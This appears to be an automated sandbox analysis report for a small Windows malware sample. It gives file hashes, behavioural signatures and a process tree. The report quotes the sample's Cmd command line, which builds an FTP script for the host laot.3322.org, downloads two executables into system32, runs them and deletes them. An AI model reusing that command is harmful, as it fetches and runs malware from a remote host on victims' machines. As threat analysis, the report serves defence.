Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/09/2024, 18:27
Static task: static1
Behavioral task: behavioral1
  Sample: d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General
Target: d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Size: 44KB
MD5: d0310b6b7e678c1100131d32fdffdf3b
SHA1: 901eabee57673826bdd5aa7f33973ab75831f33b
SHA256: e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
SHA512: 5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
SSDEEP: 768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace
Malware Config
Signatures
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ftp.exe
Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Suspicious use of WriteProcessMemory (6 IoCs)
description | pid | Process | procid_target
PID 4392 wrote to memory of 3728 | 4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe | 85
PID 4392 wrote to memory of 3728 | 4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe | 85
PID 4392 wrote to memory of 3728 | 4392 | d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe | 85
PID 3728 wrote to memory of 656 | 3728 | Cmd.exe | 88
PID 3728 wrote to memory of 656 | 3728 | Cmd.exe | 88
PID 3728 wrote to memory of 656 | 3728 | Cmd.exe | 88
Processes
1. C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
   - System Location Discovery: System Language Discovery
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   PID: 4392
   2. C:\Windows\SysWOW64\Cmd.exe
      Command line: Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 3728
      3. C:\Windows\SysWOW64\ftp.exe
         Command line: ftp -s:ftpdate.sys
         - System Location Discovery: System Language Discovery
         PID: 656
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 152B
MD5: 0fb17816f7c290e13419d68fa258edfa
SHA1: 59b9dd4af7fa17ce896b878b55b07ddc4a7936f9
SHA256: bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c
SHA512: 5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99